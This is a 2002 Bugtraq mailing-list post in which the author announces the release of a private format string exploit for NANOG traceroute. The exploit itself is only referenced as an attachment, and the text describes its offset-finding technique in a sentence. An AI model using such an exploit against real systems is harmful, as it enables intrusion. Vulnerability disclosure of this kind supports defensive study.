Nanog traceroute format string exploit.


Date: Sun, 21 Jul 2002 14:09:24 +0200
From: SpaceWalker <spacewalker@minithins.net>
To: bugtraq@securityfocus.com
Subject: Nanog traceroute format string exploit.
Cc: vuln-dev@securityfocus.com

Hello,
As the vulnerability was published some weeks ago, and no working exploit has been released (the Perl exploit was a joke), I decided to release my private exploit.
I do it only because:
- This exploit will never be used to haxor something because I never saw this traceroute used by default.
- This exploit finds offsets "by the proper way" and doesn't place the target addresses in the format string (and is interesting to study for beginners).

Have phun, please don't haxor with it.
SpaceWalker

Attachment: tracerouteexp.tgz (application/octet-stream)
